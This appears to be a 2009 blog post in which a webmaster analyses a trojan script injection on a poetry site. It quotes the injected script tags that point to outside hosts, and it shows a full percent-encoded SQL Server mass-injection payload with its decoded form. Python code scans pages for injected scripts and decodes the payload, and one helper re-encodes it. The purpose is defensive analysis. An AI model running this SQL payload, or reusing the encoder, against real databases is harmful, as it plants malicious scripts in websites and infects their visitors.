adandelion

诗词在线 http:/www.chinapoesy.com


Site hit by a trojan script injection on New Year's Day 2009

A trojan script tag was appended to the end of the page:

<script src=http://%68%68%6A%32%2E%63%6E></script>
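The tag above hides its host behind percent escapes: %68%68%6A%32%2E%63%6E decodes to hhj2.cn, and the tag the SQL payload further down appends uses the same trick in nuc%6Cear3. The following scanner is an added example, not code from the original post: it takes a constructed sample page (the site's own script plus the two injected tags quoted on this page), an assumed allow-list host (www.chinapoesy.com), and reports every script src that is percent-obfuscated or points off-site, plus any content sitting after the closing </html>, which is how the injection showed up here.

```python
import re
from pathlib import Path
from urllib.parse import unquote, urlsplit

# Constructed sample page: the site's own script followed by the two injected tags
# quoted in this post. They sit after </html>, which is itself a tell.
SAMPLE_HTML = (
    "<html><body><p>a poem</p>\n"
    '<script src="/js/site.js"></script>\n'
    "</body></html>\n"
    "<script src=http://%68%68%6A%32%2E%63%6E></script>\n"
    "<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script>\n"
)

# Assumption: the only host allowed to serve scripts to this site is its own.
ALLOWED_HOSTS = {"www.chinapoesy.com"}

# <script ... src=VALUE with or without quotes, any case (the payload used <Script Src=).
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.IGNORECASE)


def decode_src(src):
    """Percent-decode a src value until it stops changing (defeats double encoding).
    Returns (decoded_url, hostname); hostname is None for relative URLs."""
    decoded, prev = src, None
    while decoded != prev:
        prev, decoded = decoded, unquote(decoded)
    return decoded, urlsplit(decoded).hostname


def find_injected_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """Return every <script src> whose value is percent-obfuscated or whose host is off the allow list."""
    findings = []
    for m in SCRIPT_SRC.finditer(html):
        raw = m.group(1)
        decoded, host = decode_src(raw)
        obfuscated = raw != decoded
        external = host is not None and host.lower() not in allowed_hosts
        if obfuscated or external:
            findings.append({"raw": raw, "decoded": decoded, "host": host,
                             "obfuscated": obfuscated, "external": external})
    return findings


def content_after_html(html):
    """True when non-whitespace follows the last </html>: an appended payload, as on this site."""
    idx = html.lower().rfind("</html>")
    return idx != -1 and html[idx + len("</html>"):].strip() != ""


def scan_tree(root, suffixes=(".htm", ".html", ".asp", ".aspx")):
    """Walk a web root and report files that carry suspect script tags or trailing content."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(errors="replace")
            hits = find_injected_scripts(text)
            trailing = content_after_html(text)
            if hits or trailing:
                report[str(path)] = {"scripts": hits, "trailing": trailing}
    return report


if __name__ == "__main__":
    for hit in find_injected_scripts(SAMPLE_HTML):
        print(hit["raw"], "->", hit["decoded"], "host:", hit["host"])
    print("content after </html>:", content_after_html(SAMPLE_HTML))
```

Run `scan_tree("/path/to/webroot")` against the document root to locate every file that carries such a tag; a file that is clean on disk but still serves the tag means the injection lives in the database rather than in the page files.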

This is maddening.

What can I do? Unless I set the files read-only they will just keep getting tampered with...

The directory permissions don't even give the user account modify rights...

Does anyone know about this? Thanks.

The logs show someone attempting SQL injection. If the string below is not an encoded string, then what is it?

'%3B%44%65%43%4C%61%52%45%20%40%53%20%4E%76%41%72%43%48%61%52%28%34%30%30%30%29%3B%53%65%54%20%40%53%3D%43%61%53%74%28%30%78%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%30%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%32%30%30%33%35%30%30%33%35%30%30%32%39%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%32%30%30%33%35%30%30%33%35%30%30%32%39%30%30%32%30%30%30%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%36%30%30%36%46%30%30%37%32%30%30%32%30%30%30%35%33%30%30%36%35%30%30%36%43%30%30%36%35%30%30%36%33%30%30%37%34%30%30%32%30%30%30%34%31%30%30%32%45%30%30%34%45%30%30%36%31%30%30%36%44%30%30%36%35%30%30%32%43%30%30%34%32%30%30%32%45%30%30%34%45%30%30%36%31%30%30%36%44%30%30%36%35%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%35%33%30%30%37%39%30%30%37%33%30%30%36%46%30%30%36%32%30%30%36%41%30%30%36%35%30%30%36%33%30%30%37%34%30%30%37%33%30%30%32%30%30%30%34%31%30%30%32%43%30%30%35%33%30%30%37%39%30%30%37%33%30%30%36%33%30%30%36%46%30%30%36%43%30%30%37%35%30%30%36%44%30%30%36%45%30%30%37%33%30%30%32%30%30%30%34%32%30%30%32%30%30%30%35%37%30%30%36%38%30%30%36%35%30%30%37%32%30%30%36%35%30%30%32%30%30%30%34%31%30%30%32%45%30%30%34%39%30%30%36%34%30%30%33%44%30%30%34%32%30%30%32%45%30%30%34%39%30%30%36%34%30%30%32%30%30%30%34%31%30%30%36%45%30%30%36%34%30%30%32%30%30%30%34%31%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%32%37%30%30%37%35%30%30%32%37%30%30%32%30%30%30%34%31%30%30%36%45%30%30%36%34%30%30%32%30%30%30%32%38%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%39%30%30%33%39%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%33%30%30%33%35%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%32%30%30%33%33%30%30%33%31%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%31%30%30%33%36%30%30%33%37%30%30%32%39%30%30%32%30%30%30%34%46%30%30%37%30%30%30%36%35%30%30%36%45%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%32%30%30%30%34%45%30%30%36%35%30%30%37%38%30%30%37%34%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%39%30%30%36%45%30%30%37%34%30%30%36%46%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%35%37%30%30%36%38%30%30%36%39%30%30%36%43%30%30%36%35%30%30%32%38%30%30%34%30%30%30%34%30%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%35%46%30%30%35%33%30%30%37%34%30%30%36%31%30%30%37%34%30%30%37%35%30%30%37%33%30%30%33%44%30%30%33%30%30%30%32%39%30%30%32%30%30%30%34%32%30%30%36%35%30%30%36%37%30%30%36%39%30%30%36%45%30%30%32%30%30%30%34%35%30%30%37%38%30%30%36%35%30%30%36%33%30%30%32%38%30%30%32%37%30%30%37%35%30%30%37%30%30%30%36%34%30%30%36%31%30%30%37%34%30%30%36%35%30%30%32%30%30%30%35%42%30%30%32%37%30%30%32%42%30%30%34%30%30%30%35%34%30%30%32%42%30%30%32%37%30%30%35%44%30%30%32%30%30%30%35%33%30%30%36%35%30%30%37%34%30%30%32%30%30%30%35%42%30%30%32%37%30%30%32%42%30%30%34%30%30%30%34%33%30%30%32%42%30%30%32%37%30%30%35%44%30%30%33%44%30%30%35%32%30%30%37%34%30%30%37%32%30%30%36%39%30%30%36%44%30%30%32%38%30%30%34%33%30%30%36%46%30%30%36%45%30%30%37%36%30%30%36%35%30%30%37%32%30%30%37%34%30%30%32%38%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%38%30%30%33%30%30%30%33%30%30%30%33%30%30%30%32%39%30%30%32%43%30%30%35%42%30%30%32%37%30%30%32%42%30%30%34%30%30%30%34%33%30%30%32%42%30%30%32%37%30%30%35%44%30%30%32%39%30%30%32%39%30%30%32%42%30%30%32%37%30%30%32%37%30%30%33%43%30%30%35%33%30%30%36%33%30%30%37%32%30%30%36%39%30%30%37%30%30%30%37%34%30%30%32%30%30%30%35%33%30%30%37%32%30%30%36%33%30%30%33%44%30%30%36%38%30%30%37%34%30%30%37%34%30%30%37%30%30%30%33%41%30%30%32%46%30%30%32%46%30%30%36%33%30%30%32%45%30%30%36%45%30%30%37%35%30%30%36%33%30%30%32%35%30%30%33%36%30%30%34%33%30%30%36%35%30%30%36%31%30%30%37%32%30%30%33%33%30%30%32%45%30%30%36%33%30%30%36%46%30%30%36%44%30%30%32%46%30%30%36%33%30%30%37%33%30%30%37%33%30%30%32%46%30%30%36%33%30%30%32%45%30%30%36%41%30%30%37%33%30%30%33%45%30%30%33%43%30%30%32%46%30%30%35%33%30%30%36%33%30%30%37%32%30%30%36%39%30%30%37%30%30%30%37%34%30%30%33%45%30%30%32%37%30%30%32%37%30%30%32%37%30%30%32%39%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%32%30%30%30%34%45%30%30%36%35%30%30%37%38%30%30%37%34%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%39%30%30%36%45%30%30%37%34%30%30%36%46%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%34%35%30%30%36%45%30%30%36%34%30%30%32%30%30%30%34%33%30%30%36%43%30%30%36%46%30%30%37%33%30%30%36%35%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%34%30%30%36%35%30%30%36%31%30%30%36%43%30%30%36%43%30%30%36%46%30%30%36%33%30%30%36%31%30%30%37%34%30%30%36%35%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%20%61%53%20%4E%76%41%72%43%68%41%52%28%34%30%30%30%29%29%3B%45%78%45%63%28%40%53%29%3B%2D%2D

After percent-decoding:

';DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(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aS NvArChAR(4000));ExEc(@S);--

Final SQL (the 0x... literal read as the UTF-16LE bytes of an NVARCHAR):

Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script>''')Fetch Next From  Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor

Purpose:

It walks every user table (A.Xtype='u') and, for every column of type ntext (xtype 99), text (35), nvarchar (231) or varchar (167), appends the <Script Src=...> tag to the value in every row. Every page that renders one of those columns then serves the script. Because the tag lives in database rows rather than in files on disk, read-only files and directory permissions do not stop it: the page files stay clean and the script is added when the data is rendered.
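The two decoding steps above (percent-decoding, then reading the hex literal in CaSt(0x... aS NvArChAR) as UTF-16LE) can be reproduced with the following Python decoder. It is an added example, not code from the original post. The logged prefix and suffix are copied from the log line on this page with the hex literal cut down to its first 32 digits so the sample stays short, and the final SQL is the one quoted above. The encode_payload helper reconstructs the shape of the logged string from that SQL so the decoder can be checked on a full-length payload; it mirrors what the log shows, but the attacker's own tooling is not known and the helper is only a test fixture.

```python
import re
from urllib.parse import unquote

# Opening and closing of the logged string, copied from the log line in this post. The hex literal
# between them is cut down to its first 32 digits, the UTF-16LE bytes of "Declare ".
LOGGED_PREFIX = (
    "'%3B%44%65%43%4C%61%52%45%20%40%53%20%4E%76%41%72%43%48%61%52%28%34%30%30%30%29"
    "%3B%53%65%54%20%40%53%3D%43%61%53%74%28%30%78"
    "%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%30"
)
LOGGED_SUFFIX = "%20%61%53%20%4E%76%41%72%43%68%41%52%28%34%30%30%30%29%29%3B%45%78%45%63%28%40%53%29%3B%2D%2D"
TRUNCATED_LOG = LOGGED_PREFIX + LOGGED_SUFFIX

# The final SQL recovered in this post, used to rebuild a full-length sample of the same shape.
FINAL_SQL = (
    "Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name "
    "From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 "
    "Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C "
    "While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),"
    "['+@C+']))+''<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script>''')Fetch Next From  "
    "Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor"
)

# CAST(0x<hex> AS NVARCHAR...) or the single-byte VARCHAR variant, in any letter case.
CAST_RE = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+(n?varchar)", re.IGNORECASE)
# SQL Server syscolumns.xtype codes named in the payload.
XTYPE_NAMES = {99: "ntext", 35: "text", 231: "nvarchar", 167: "varchar"}


def decode_payload(logged):
    """Step 1: percent-decode the logged parameter (the post's 'after decoding' line).
    Step 2: take the 0x literal out of CAST(0x... AS NVARCHAR) and decode it as UTF-16LE, which is
    what SQL Server does for that cast (single-byte for the VARCHAR variant).
    Returns (step1, step2); step2 is None when there is no such cast."""
    step1 = unquote(logged)
    m = CAST_RE.search(step1)
    if not m:
        return step1, None
    raw = bytes.fromhex(m.group(1))
    encoding = "utf-16-le" if m.group(2).lower().startswith("n") else "latin-1"
    return step1, raw.decode(encoding)


def summarize(final_sql):
    """What the recovered SQL does: the column types it targets and the string it appends."""
    types = [XTYPE_NAMES.get(int(x), "xtype " + x) for x in re.findall(r"B\.Xtype=(\d+)", final_sql)]
    m = re.search(r"\+''(.+?)'''\)", final_sql)
    return {"column_types": types, "appended": m.group(1) if m else None}


def encode_payload(final_sql):
    """Test fixture: wrap the SQL as a hex NVARCHAR literal inside the same mixed-case
    DECLARE/CAST/EXEC shell and percent-encode every byte except the leading quote, giving a
    string of the same shape as the logged one."""
    hexlit = final_sql.encode("utf-16-le").hex().upper()
    shell = ";DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x" + hexlit + " aS NvArChAR(4000));ExEc(@S);--"
    return "'" + "".join("%%%02X" % b for b in shell.encode("ascii"))


if __name__ == "__main__":
    step1, step2 = decode_payload(TRUNCATED_LOG)
    print(step1)
    print(repr(step2))
    print(summarize(decode_payload(encode_payload(FINAL_SQL))[1]))
```

The regex deliberately ignores letter case because the payload mixes it (DeCLaRE, CaSt, ExEc) to slip past keyword filters; a filter that only matches lower-case `cast(` or `exec(` would have missed it too, which is why this family of attacks was stopped by parameterized queries rather than by keyword blocking.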

Luckily it did not succeed; otherwise it would have been a disaster.

This one did not succeed, but another one did.

posted on 2009-01-01 10:17 by 猪头, 1705 views, 7 comments